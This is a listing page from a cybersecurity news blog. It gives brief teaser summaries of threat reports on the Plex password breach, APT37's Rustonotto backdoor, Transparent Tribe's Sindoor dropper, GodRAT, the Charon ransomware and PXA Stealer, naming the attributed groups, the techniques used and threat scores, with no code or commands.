Cybersec Sentinel

Cybersec Sentinel

Cybersec Sentinel: 30+ years of IT expertise, delivering clear, actionable cyber security insights.
Plex users urged to reset passwords after database compromise
Breach, Article, news, Plex

Plex users urged to reset passwords after database compromise

Threat Group – Unknown threat actor Threat Type – Data Breach / Account Compromise Exploited Vulnerabilities – Unauthorised access to Plex authentication database Malware Used – None confirmed Threat Score – 🔴 7.5 High – Large-scale exposure of account credentials with password reuse risks Last Threat Observation – 8 September 2025 Overview On 8 September 2025, Plex confirmed
2 min read
Windows under threat from Rustonotto Rust backdoor and Python loader operated by APT37

Windows under threat from Rustonotto Rust backdoor and Python loader operated by APT37

Threat Group – APT37 (ScarCruft / Ruby Sleet / Velvet Chollima) Threat Type – Backdoor / Surveillance Exploited Vulnerabilities – Spear-phishing via malicious Windows shortcut (LNK) and CHM help file vectors Malware Used – Rustonotto (Rust-based backdoor), Chinotto (PowerShell), FadeStealer (Python-based stealer) Threat Score – 5.5 🟠 Elevated Justification – Combines multiple stages: stealthy Rust backdoor, multi-stage infection chain,
2 min read
Sindoor Dropper Phishing Exploits Linux Desktop Files for Persistent Remote Control
Phishing

Sindoor Dropper Phishing Exploits Linux Desktop Files for Persistent Remote Control

Threat Group: Transparent Tribe / APT36 / Mythic Leopard / G0134 Threat Type: Targeted phishing dropper, Linux desktop shortcut abuse, remote administration tool deployment, cyber espionage Exploited Vulnerabilities: No public CVE exploitation confirmed. Abuse of Linux .desktop launcher behaviour, user execution, weak attachment controls, and trusted cloud storage delivery. Malware Used: Sindoor Dropper
5 min read
Skype Delivered SCR and PIF Files Deploy GodRAT Malware in Financial Campaigns
Malware

Skype Delivered SCR and PIF Files Deploy GodRAT Malware in Financial Campaigns

Threat Group: Winnti (APT41) – suspected attribution based on code lineage and targeting Threat Type: Remote Access Trojan (RAT) Exploited Vulnerabilities: Social engineering via Skype delivering malicious .SCR and .PIF files containing steganographic shellcode in JPEGs and DLL sideloading Malware Used: GodRAT – evolution of Gh0st RAT and AwesomePuppet, featuring plugin-based architecture
4 min read
Microsoft 365 Exchange Online Direct Send exploited for internal phishing campaigns
Phishing

Microsoft 365 Exchange Online Direct Send exploited for internal phishing campaigns

Threat Group: Opportunistic and financially motivated actors targeting multiple sectors Threat Type: Phishing and email infrastructure abuse Exploited Vulnerabilities: Abuse of Microsoft 365 Exchange Online Direct Send feature; implicit trust of unauthenticated internal-looking emails; weak or unenforced SPF, DKIM, and DMARC Malware Used: None required for initial access; follow-on payloads
4 min read
Charon ransomware adopts APT style tactics to target Middle East public sector and aviation
Ransomware

Charon ransomware adopts APT style tactics to target Middle East public sector and aviation

Threat Group: Suspected China linked Earth Baxia affiliate or imitator Threat Type: Ransomware Exploited Vulnerabilities: None confirmed. Suspected spear phishing and DLL sideloading Malware Used: Ransom.Win64.CHARON.THGBCBE Threat Score: 🔴 High (7.5/10) – Advanced persistent threat style capabilities, targeted operations, destructive behaviours, and potential state alignment Last Threat
3 min read
PXA Stealer Malware Uses Trusted Cloud Services to Exfiltrate Government and Education Credentials
Malware

PXA Stealer Malware Uses Trusted Cloud Services to Exfiltrate Government and Education Credentials

Threat Group: Vietnamese-speaking cybercrime actors (possible overlap with CoralRaider) Threat Type: Python-based Information Stealer (Infostealer) Exploited Vulnerabilities: DLL sideloading, phishing ZIP archives, abuse of legitimate cloud services (Cloudflare Workers, Dropbox) Malware Used: PXA Stealer Threat Score: 🔥 Critical (9.0/10) – Due to advanced evasion, large-scale credential theft, and abuse of
3 min read